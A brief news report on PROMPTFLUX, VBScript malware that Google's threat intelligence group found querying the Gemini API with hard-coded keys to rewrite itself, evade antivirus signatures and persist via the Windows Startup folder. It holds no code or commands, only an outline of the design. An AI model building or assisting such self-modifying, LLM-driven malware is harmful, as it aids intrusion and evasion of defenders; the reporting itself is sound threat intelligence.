Google Alerts Users to New PROMPTFLUX Malware Leveraging Gemini API for Self-Modifying Code
The Google Threat Intelligence Group (GTIG) has identified a new wave of malicious activity in which artificial intelligence is directly integrated into malware operations. The most notable discovery, called PROMPTFLUX, represents the first known use of “just-in-time” AI — a system that enables malware to dynamically alter its own code during execution.
AI-Powered Self-Modifying Mechanism
Unlike traditional obfuscation methods, PROMPTFLUX connects with the Gemini API to rewrite and regenerate its VBScript source code in real time. This allows the malware to bypass signature-based antivirus detection by constantly changing its structure and content.
Use of Gemini API and Model
Researchers discovered that PROMPTFLUX makes use of Gemini’s “gemini-1.5-flash-latest” model to retrieve updated logic and executable components. The infection transmits requests via hard-coded API keys, sending prompts to Gemini for new VBScript variants specifically designed to evade detection.
Automation Through the “Thinking Robot” Module
A component named “Thinking Robot” further streamlines these operations. It repeatedly queries the Gemini API, generating fresh VBScript files and placing them in the Windows Startup folder to ensure persistence on compromised systems.
This adaptive AI-driven mechanism marks a significant step toward autonomous and self-evolving malware powered by large language models.
Author’s Summary
PROMPTFLUX malware demonstrates the integration of AI in cyber threats, using Gemini’s model to autonomously evolve and evade detection, signaling a new phase in intelligent malware design.